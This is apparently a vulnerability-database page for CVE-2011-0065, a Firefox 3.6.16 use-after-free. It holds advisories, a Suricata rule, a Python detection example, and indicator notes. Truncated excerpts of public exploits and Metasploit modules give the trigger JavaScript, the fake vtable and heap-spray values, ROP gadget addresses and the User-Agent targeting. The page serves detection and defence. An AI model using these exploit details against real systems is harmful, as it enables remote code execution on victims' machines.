CVE-2011-0065
Published 2011-05-07
Priority: P2 · 65 · critical · CVSS 2.0 base score 10.0
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit code available (see the Exploit-DB and Metasploit entries below)
EPSS: 73.66% (99.4th percentile)
Use-after-free vulnerability in Mozilla Firefox before 3.5.19 and 3.6.x before 3.6.17, and SeaMonkey before 2.0.14, allows remote attackers to execute arbitrary code via vectors related to OBJECT's mChannel.
Affected
150 ranges · showing 25 (only the first displayed row carries version data; the remaining rows list mozilla / firefox with no range or fixed version)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | <= 3.5.18 | 3.5.19 (per the CVE description) |
| mozilla | firefox | 3.6.x < 3.6.17 (per the CVE description) | 3.6.17 |
| mozilla | seamonkey | < 2.0.14 (per the CVE description) | 2.0.14 |
Detection & IOCs (extracted from sources)
Indicator strings quoted from the public exploits:
- fakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink); fakeobject.onChannelRedirect(null,new Object,0);
- fakevtable = unescape("\x00%u1000")
- var filler = unescape("%u001c%u1000")
Notes:
- Trigger method: the exploit calls QueryInterface(nsIChannelEventSink) and then onChannelRedirect(null, new Object, 0) on an OBJECT element, which frees mChannel and leaves a dangling pointer that is reused when the element's data attribute is set.
- Delivery is a browser drive-by: the server answers with Content-Type: text/html carrying the exploit JavaScript, served only to a Firefox 3.6.16 User-Agent.
- User-Agent filtering: the OS X module checks for 'Intel Mac OS X 10.6' and 'Firefox/3.6.16' in the User-Agent header and drops requests that do not match. Firefox/3.6.16 User-Agents in web server logs, combined with responses carrying the strings above, are worth hunting for.
- Heap spray uses a 0x0c0c0c0c sled; the fake vtable pointer value is 0x10000000 (unescape('\x00%u1000')) and the ROP pivot starts at 0x0c0c0048.
- DEP bypass: the ROP chain uses an xul.dll gadget at 0x1052c871 (mov esp,[ecx]) and kernel32 VirtualProtect at 0x7c801ad4; these addresses appearing in memory or on the wire are a strong indicator.
- The Windows 7 variant relies on a Java 6 or older installation to bypass ASLR (its ROP chain is built from the non-randomized MSVCR71.dll, see below); monitor for Firefox 3.6.16 running alongside Java 6 together with suspicious OBJECT element manipulation.
- Post-exploitation: the Metasploit module sets InitialAutoRunScript to 'migrate -f', so the payload migrates into a freshly spawned process right after execution; look for unexpected processes spawned by Firefox.
- The Metasploit OS X module targets only Firefox 3.6.16 on Mac OS X 10.6.x (10.6.6, 10.6.7, 10.6.8) and 10.7.x (10.7.2, 10.7.3); the fake vtable addresses (Fakevtable: 0x2727, Fakefunc: 0x2727001c) are hardcoded for x86 OS X targets and will not work on other platforms.
- The Windows XP SP3 ROP chain uses a jmp esp gadget at 0x1003876B (xul.dll) and VirtualProtect at 0x7c801ad4 (kernel32); these addresses are version and patch-level specific and differ on other Windows builds.
- The Windows 7 variant (Exploit-DB 17672) uses a different ROP chain sourced from MSVCR71.dll; gadget addresses (e.g. 0x7c346c0a, 0x7c37a140) are specific to that DLL version.
- JavaScript variable names in the Metasploit modules are randomized at runtime (rand_text_alpha), so static matching on variable names will not reliably detect this exploit; match on the API call strings instead, as the Suricata rule below does.
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vendor_redhat | — | 10.0 | CRITICAL | — |
| vendor_ubuntu | — | 10.0 | CRITICAL | — |
GHSA
GHSA-j27m-p5vq-3f4g: Use-after-free vulnerability in Mozilla Firefox before 3
ghsa_unreviewed · 2022-05-03 · severity HIGH
Use-after-free vulnerability in Mozilla Firefox before 3.5.19 and 3.6.x before 3.6.17, and SeaMonkey before 2.0.14, allows remote attackers to execute arbitrary code via vectors related to OBJECT's mChannel.
Ubuntu
Thunderbird regression
vendor_ubuntu · 2011-06-06 · CVSS 10.0 · CRITICAL
Summary: An empty menu bar sometimes appeared after upgrade in USN-1122-2
USN-1122-2 fixed vulnerabilities in Thunderbird on Ubuntu 11.04. A
regression was introduced which caused Thunderbird to display an empty menu
bar. This update fixes the problem. We apologize for the inconvenience.
Original advisory details:
It was discovered that there was a vulnerability in the memory handling of
certain types of content. An attacker could exploit this to possibly run
arbitrary code as the user running Thunderbird. (CVE-2011-0081)
It was discovered that Thunderbird incorrectly handled certain JavaScript
requests. If JavaScript were enabled, an attacker could exploit this to
possibly run arbitrary code as the user running Thunderbird.
(CVE-2011-0069)
Ian Beer disc
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu · 2011-05-05 · CVSS 10.0 · CRITICAL
Summary: Thunderbird could be made to run programs as your login if it opened specially crafted mail.
It was discovered that there was a vulnerability in the memory handling of
certain types of content. An attacker could exploit this to possibly run
arbitrary code as the user running Thunderbird. (CVE-2011-0081)
It was discovered that Thunderbird incorrectly handled certain JavaScript
requests. If JavaScript were enabled, an attacker could exploit this to
possibly run arbitrary code as the user running Thunderbird.
(CVE-2011-0069)
Ian Beer discovered a vulnerability in the memory handling of a certain
types of documents. An attacker could exploit this to possibly run
arbitrary code as the user running Thunderbird. (CVE-2011-0070)
Bob Clary, Henri Siv
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu · 2011-05-05 · CVSS 10.0 · CRITICAL
Summary: Thunderbird could be made to run programs as your login if it opened specially crafted mail.
USN-1122-1 fixed vulnerabilities in Thunderbird for Lucid and Maverick.
This update provides the corresponding fixes for Natty.
Original advisory details:
It was discovered that there was a vulnerability in the memory handling of
certain types of content. An attacker could exploit this to possibly run
arbitrary code as the user running Thunderbird. (CVE-2011-0081)
It was discovered that Thunderbird incorrectly handled certain JavaScript
requests. If JavaScript were enabled, an attacker could exploit this to
possibly run arbitrary code as the user running Thunderbird.
(CVE-2011-0069)
Ian Beer discovered a vulnerability in the memory handling of a cer
Ubuntu
Xulrunner vulnerabilities
vendor_ubuntu · 2011-04-30 · primary CVE: CVE-2011-0077
Summary: Multiple xulrunner-1.9.1 vulnerabilities
A large number of security issues were discovered in the Gecko rendering
engine. If a user were tricked into viewing a malicious website, a remote
attacker could exploit a variety of issues related to web browser security,
including cross-site scripting attacks, denial of service attacks, and
arbitrary code execution.
Instructions: After a standard system update you need to restart any applications which
use Xulrunner to make all the necessary changes.
Ubuntu
Firefox and Xulrunner vulnerabilities
vendor_ubuntu · 2011-04-29 · CVSS 10.0 · CRITICAL · primary CVE: CVE-2011-0081
Summary: Multiple vulnerabilities in Firefox and Xulrunner
It was discovered that there was a vulnerability in the memory handling of
certain types of content. An attacker could exploit this to possibly run
arbitrary code as the user running Firefox. (CVE-2011-0081)
It was discovered that Firefox incorrectly handled certain JavaScript
requests. An attacker could exploit this to possibly run arbitrary code as
the user running Firefox. (CVE-2011-0069)
Ian Beer discovered a vulnerability in the memory handling of a certain
types of documents. An attacker could exploit this to possibly run
arbitrary code as the user running Firefox. (CVE-2011-0070)
Bob Clary, Henri Sivonen, Marco Bonardo, Mats Palmgren and Jesse Ruderman
discovered several memo
Red Hat
Mozilla mChannel use after free (MFSA 2011-13)
vendor_redhat · 2011-04-28 · CVSS 10.0 · CRITICAL · CWE-416
Use-after-free vulnerability in Mozilla Firefox before 3.5.19 and 3.6.x before 3.6.17, and SeaMonkey before 2.0.14, allows remote attackers to execute arbitrary code via vectors related to OBJECT's mChannel.
Suricata
ET WEB_CLIENT Mozilla Firefox mChannel Object Dangling Pointer Use-After-Free Memory Corruption Attempt
suricata · 2011-08-18 · sid 2013417
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Mozilla Firefox mChannel Object Dangling Pointer Use-After-Free Memory Corruption Attempt"; flow:established,to_client; file.data; content:"QueryInterface|28|Components.interfaces.nsIChannelEventSink|29|"; fast_pattern; nocase; content:"onChannelRedirect|28|null"; nocase; distance:0; reference:url,www.mozilla.org/security/announce/2011/mfsa2011-13.html; reference:bid,47635; reference:cve,2011-0065; classtype:attempted-user; sid:2013417; rev:3; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2011_08_18, cve CVE_2011_0065, deployment Perimeter, co
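How the rule above and the indicators in the Detection & IOCs section combine in practice, as an added example that is not part of this page and not code from Emerging Threats or Metasploit: a Python re-implementation of the rule's two content matches (nocase, distance:0, scoped to the response body by file.data), a decoder for the unescape() literals the exploits use to lay down the fake vtable pointer and the 0x0c0c0c0c sled, and the request-side User-Agent gate. Function names, hit labels, the sample HTML bodies and the access-log line are all constructed for this example.

```python
"""Added example (not code from this page, Emerging Threats or Metasploit):
request- and response-side checks for the CVE-2011-0065 drive-by. Function
names, hit labels and all sample data are constructed for illustration."""
import re
import struct

# 1. Body matching equivalent to ET sid:2013417. Both contents are nocase;
#    the second has distance:0, so it must start at or after the end of the
#    first match. file.data scopes the match to the HTTP body, not headers.
QI_CALL = "queryinterface(components.interfaces.nsichanneleventsink)"
REDIRECT_CALL = "onchannelredirect(null"


def matches_et_2013417(body: bytes) -> bool:
    """True if the response body would trip ET sid:2013417."""
    text = body.decode("latin-1").lower()        # byte-preserving, case-folded
    first = text.find(QI_CALL)
    return first >= 0 and text.find(REDIRECT_CALL, first + len(QI_CALL)) >= 0


# 2. Decoding unescape() literals. JS strings are UTF-16: "%uXXXX" is one code
#    unit, "%XX" and the source escape "\xNN" are one unit each, any other char
#    is itself. Units are stored little-endian, which is why
#    unescape("\x00%u1000") spells the dword 0x10000000 (the fake vtable).
_TOKEN = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|\\x([0-9a-fA-F]{2})|(.)", re.S)
_UNESCAPE_ARG = re.compile(r'''unescape\(\s*(['"])(.*?)\1\s*\)''', re.S)
SLED_DWORD = 0x0C0C0C0C       # heap-spray sled value used by the Windows exploits
FAKE_VTABLE = 0x10000000      # value of unescape("\x00%u1000") in the Win7 exploit


def unescape_literal_to_bytes(literal: str) -> bytes:
    """Expand a JS string literal the way unescape() does; return UTF-16LE bytes."""
    units = [int(u4 or u2 or x2, 16) if (u4 or u2 or x2) else ord(ch)
             for u4, u2, x2, ch in _TOKEN.findall(literal)]
    return b"".join(struct.pack("<H", u) for u in units)


def dwords(data: bytes) -> list:
    """Little-endian 32-bit view of a byte string; a trailing partial word is dropped."""
    return [struct.unpack_from("<I", data, i)[0] for i in range(0, len(data) - 3, 4)]


def unescape_dwords(body: bytes) -> list:
    """Every dword assembled by an unescape("...") call anywhere in the body."""
    out = []
    for m in _UNESCAPE_ARG.finditer(body.decode("latin-1")):
        out.extend(dwords(unescape_literal_to_bytes(m.group(2))))
    return out


# 3. Request-side targeting: the published modules only serve Firefox 3.6.16
#    (the OS X one additionally wants "Intel Mac OS X 10.6" in the UA).
_UA_FIELD = re.compile(r'"([^"]*)"\s*$')      # last quoted field of a combined log line


def targeted_ua(ua: str) -> bool:
    return "Firefox/3.6.16" in ua


def ua_from_combined_log(line: str) -> str:
    m = _UA_FIELD.search(line)
    return m.group(1) if m else ""


def triage(request_ua: str, response_body: bytes) -> list:
    """Combine request- and response-side indicators into a list of hit labels."""
    hits = []
    if targeted_ua(request_ua):
        hits.append("ua:firefox-3.6.16")
    if matches_et_2013417(response_body):
        hits.append("body:et-2013417")
    seen = unescape_dwords(response_body)
    if SLED_DWORD in seen:
        hits.append("body:0c0c-sled")
    if FAKE_VTABLE in seen:
        hits.append("body:fake-vtable-0x10000000")
    return hits


# Constructed samples. Identifiers are randomised by the real modules
# (rand_text_alpha); the rule still fires because it keys on the API strings.
EXPLOIT_BODY = rb"""<html><script>
var qzkv = document.getElementById("d");
qzkv.QueryInterface(Components.interfaces.nsIChannelEventSink);
qzkv.onChannelRedirect(null,new Object,0);
var wpol = unescape("\x00%u1000");
var sled = unescape("%u0c0c%u0c0c");
</script></html>"""
# Legitimate listener on the same interface: the callback gets real channels, never null.
BENIGN_BODY = rb"""<script>
sink.QueryInterface(Components.interfaces.nsIChannelEventSink);
sink.onChannelRedirect(oldChannel, newChannel, flags);
</script>"""
# Order matters: with distance:0 the redirect call has to follow the QI call.
REORDERED_BODY = rb"""<script>
x.onChannelRedirect(null, new Object, 0);
x.QueryInterface(Components.interfaces.nsIChannelEventSink);
</script>"""
LOG_LINE = ('203.0.113.7 - - [10/Aug/2011:05:58:02 +0000] "GET /index.html HTTP/1.1" 200 4217 "-" '
            '"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16"')

if __name__ == "__main__":
    print(triage(ua_from_combined_log(LOG_LINE), EXPLOIT_BODY))
```

Two things the samples make visible: the rule keys on the call strings, so randomised identifiers and case changes do not evade it, but it also needs the two calls in the order the exploit issues them, so a page that only queries nsIChannelEventSink (a legitimate redirect listener) does not fire. Decoding the unescape() literals to dwords is more robust than grepping for "%u0c0c", because the same 0x0c0c0c0c value can be spelled with "%XX" pairs or split across concatenated strings.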
Exploit-DB
Mozilla Firefox 3.6.16 (OSX) - mChannel Use-After-Free (Metasploit) (2)
exploitdb · 2012-01-17
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({
    :ua_name    => HttpClients::FF,
    :ua_minver  => "3.6.16",
    :ua_maxver  => "3.6.16",
    :os_name    => OperatingSystems::MAC_OSX,
    :javascript => true,
    :rank       => NormalRanking,
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
      'Description' => %q{
        This module exploits an use after free vulnerability in Mozilla
        Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
        O
Exploit-DB
Mozilla Firefox 3.6.16 (Windows 7) - mChannel Object Use-After-Free
exploitdb · 2011-08-16
---
Mozilla mChannel Object use after free
- Found by regenrecht
- MSF exploit by Rh0
- Win 7 fun version by mr_me

function trigger(){
    alert('ready?');
    fakeobject = document.getElementById("d"); // allocate the object
    fakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink); // append to the objects available functions
    fakeobject.onChannelRedirect(null,new Object,0); // free it
    /*
    fill the object with a fake vtable reference
    just use the start of a block for simplicity and use \x00
    because it expands to a NULL so that
    when we have the CALL DWORD PTR DS:[ECX+18], it will point to 0x10000000
    */
    fakevtable = unescape("\x00%u1000");
    var rop = "";
    // 3 instructions to pivot cleanly
    rop += unescape("%u1
Exploit-DB
Mozilla Firefox 3.6.16 (Windows) - mChannel Use-After-Free (Metasploit) (1)
exploitdb · 2011-08-10
---
##
# $Id: mozilla_mchannel.rb 13507 2011-08-10 05:58:02Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({
    :ua_name    => HttpClients::FF,
    :ua_minver  => "3.6.16",
    :ua_maxver  => "3.6.16",
    :os_name    => OperatingSystems::WINDOWS,
    :javascript => true,
    :rank       => NormalRanking,
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
      'Description' => %q{
        This module exploits an use after free vulnerability in
Exploit-DB
Mozilla Firefox 3.6.16 - OBJECT mChannel Remote Code Execution (DEP Bypass) (Metasploit)
exploitdb · 2011-08-05
---
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({
    :ua_name    => HttpClients::FF,
    :ua_minver  => "3.6.16",
    :ua_maxver  => "3.6.16",
    :os_name    => OperatingSystems::WINDOWS,
    :javascript => true,
    :rank       => NormalRanking,
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Mozilla Firefox 3.6.16 mChannel use after free Exploit',
      'Description' => %q{
        This module exploits an use after free vulnerability in Mozilla
        Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
        OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
        becomes a dangling pointer and can be reused when setting the OBJECTs
        data attribute. (Discovered by regenrecht). This module uses heapspray
        with a minimal ROP chain to bypass
Metasploit
Mozilla Firefox 3.6.16 mChannel Use-After-Free
metasploit
This module exploits a use-after-free vulnerability in Mozilla Firefox 3.6.16. An OBJECT element's mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECT's data attribute. This module has been tested on Mac OS X 10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3.
Metasploit
Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability
metasploit
This module exploits a use-after-free vulnerability in Mozilla Firefox 3.6.16. An OBJECT element's mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECT's data attribute. (Discovered by regenrecht.) This module uses a heap spray with a minimal ROP chain to bypass DEP on Windows XP SP3. Additionally, a Windows 7 target is provided that uses Java 6 and below to avoid ASLR.
References
http://downloads.avaya.com/css/P8/documents/100144158
http://securityreason.com/securityalert/8326
http://securityreason.com/securityalert/8331
http://securityreason.com/securityalert/8340
http://www.debian.org/security/2011/dsa-2227
http://www.debian.org/security/2011/dsa-2228
http://www.debian.org/security/2011/dsa-2235
http://www.mandriva.com/security/advisories?name=MDVSA-2011:079
http://www.mozilla.org/security/announce/2011/mfsa2011-13.html
https://bugzilla.mozilla.org/show_bug.cgi?id=634986
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14142